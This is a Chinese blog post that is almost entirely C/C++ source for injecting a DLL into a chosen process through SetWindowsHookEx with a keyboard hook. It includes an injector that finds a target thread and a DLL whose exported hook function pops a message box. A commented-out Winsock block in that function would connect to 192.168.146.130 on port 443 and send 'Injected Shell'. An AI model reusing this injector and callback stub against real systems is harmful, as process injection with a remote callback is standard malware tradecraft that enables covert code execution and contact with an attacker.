SetWindowHookEx()注入

/*

HHOOK
WINAPI
SetWindowsHookExW(
__in int idHook, //HookType
__in HOOKPROC lpfn, //HOOkProcedure 钩子程序
__in_opt HINSTANCE hmod, //
__in DWORD dwThreadId); //挂钩线程的ID

*/
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <TlHelp32.h>

#include <Psapi.h>

#pragma comment(lib,"psapi.lib")   


/*
This method performs the actual injection. It gets an appropriate thread id, loads the dll, 
gets the address of the inject method, then calls SetWindowsHookEx.
*/
int ProcessInjectBySetWindowHookEx(int ProcessId);
/*
This method is used to get a thread id for a process. 
It loops through all of the threads and compares their pid with the desired pid
*/
DWORD GetThreadID(DWORD ProcessId);



int main(int argc, char* argv)
{

    int ProcessId;
    puts("Inject into which PID?");
    scanf("%d",&ProcessId);
    printf("PID entered: %u
", ProcessId);
    int Result = ProcessInjectBySetWindowHookEx(ProcessId);
    if(Result == -1)
    {
        puts("Could not inject");
    }
    else
    {
        puts("Injected!");
    }
    getchar();
}


/*
This method is used to get a thread id for a process. 
It loops through all of the threads and compares their pid with the desired pid
*/
DWORD GetThreadID(DWORD ProcessId)
{
    puts("Getting Thread ID");
    HANDLE    ProcessHandle= CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(ProcessHandle != INVALID_HANDLE_VALUE)
    {
        THREADENTRY32 te;
        te.dwSize = sizeof(te);
        if( Thread32First(ProcessHandle, &te))
        {
            do
            {
                if (te.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID))
                {
                    if(te.th32OwnerProcessID == ProcessId)
                    {
                        HANDLE ThreadHandle = OpenThread(READ_CONTROL, FALSE, te.th32ThreadID);
                        if(!ThreadHandle)
                        {
                            puts("Couldn't get thread handle");
                        }
                        else
                        {
                            //DWORD tpid = GetProcessIdOfThread(hThread);
                            //printf("Got one: %u
", tpid);
                            return te.th32ThreadID;
                        }
                    }
                }
            } while( Thread32Next(ProcessHandle, &te));
        }
    }
    CloseHandle(ProcessHandle);
    return (DWORD)0;
}
/*
This method performs the actual injection. It gets an appropriate thread id, loads the dll, 
gets the address of the inject method, then calls SetWindowsHookEx.
*/
int ProcessInjectBySetWindowHookEx(int ProcessId)
{

    TCHAR    ProcessName[MAX_PATH] = TEXT("<unknown>");

    HANDLE    ProcessHandle = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, ProcessId);

    if (ProcessHandle != NULL)
    {
        HMODULE ModuleHandle;
        DWORD    NeedLength;

        if ( EnumProcessModules( ProcessHandle, &ModuleHandle, sizeof(ModuleHandle), &NeedLength) )
        {
                GetModuleBaseName( ProcessHandle, ModuleHandle, ProcessName, sizeof(ProcessName)/sizeof(TCHAR) );
        }
    }

    _tprintf( TEXT("Injecting into process %s PID: %u
"), ProcessName, ProcessId);

    DWORD ThreadID = GetThreadID(ProcessId);

    printf( "Using Thread ID %u
", ThreadID);

    if(ThreadID == (DWORD)0)
    {
        puts("Cannot find thread");
        return -1;
    }

    HMODULE DllModuleHandle = LoadLibrary("InjectDll.dll");
    if(DllModuleHandle == NULL)
    {
        puts("Cannot find DLL");
        return -1;
    }

    HOOKPROC FuncAddress = (HOOKPROC)GetProcAddress(DllModuleHandle, "inject");
    if(FuncAddress == NULL)
    {
        puts("Cannot find the function");
        return -1;
    }
    //Uses the threadID from getThreadID to inject into specific process
    HHOOK HookHandle = SetWindowsHookEx(WH_KEYBOARD, FuncAddress, DllModuleHandle, ThreadID);
    // WH_KEYBOARD   UP  Down  Evevt
    if(HookHandle == NULL)
    {
        puts("Couldn't hook the keyboard");
    }
    getchar();
    getchar();
    getchar();
    UnhookWindowsHookEx(HookHandle);
    return 0;
}



#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
extern "C" __declspec(dllexport) int inject(int code, WPARAM wParam, LPARAM lParam)
 
{
    MessageBox(NULL,"haha","haha",MB_OK);
    //WSADATA wsa;
    //SOCKET s;
    //struct sockaddr_in server;
    //char *message;

    //printf("
Initializing Winsock...");
    //if(WSAStartup(MAKEWORD(2,2),&wsa) != 0)
    //{
    //    printf("Failed. Error Code : %d", WSAGetLastError());
    //    return(CallNextHookEx(NULL, code, wParam, lParam));
    //}

    //printf("Initialized. 
");

    //if((s = socket(AF_INET, SOCK_STREAM, 0 )) == INVALID_SOCKET)
    //{
    //    printf("Could not create socket : %d", WSAGetLastError());
    //}

    //printf("Socket Created. 
");

    //server.sin_addr.s_addr = inet_addr("192.168.146.130"); //ip address
    //server.sin_family = AF_INET;
    //server.sin_port = htons( 443 );

    //if(connect(s, (struct sockaddr *)&server, sizeof(server)) < 0)
    //{
    //    puts("connect error");
    //    return(CallNextHookEx(NULL, code, wParam, lParam));
    //}

    //puts("Connected");

    //message = "Injected Shell";
    //if( send(s, message, strlen(message), 0) <0)
    //{
    //    puts("Send failed");
    //    return(CallNextHookEx(NULL, code, wParam, lParam));
    //}
    //puts("Data sent
");

    return(CallNextHookEx(NULL, code, wParam, lParam));

}
INT APIENTRY DllMain(HMODULE hDll, DWORD Reason, LPVOID Reserved)
{
 

    switch(Reason)
    {
        case DLL_PROCESS_ATTACH:
            
            break;
        case DLL_PROCESS_DETACH:
            
            break;
        case DLL_THREAD_ATTACH:
           
            break;
        case DLL_THREAD_DETACH:
             
            break;
    }


    return TRUE;
}
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/yifi/p/6527731.html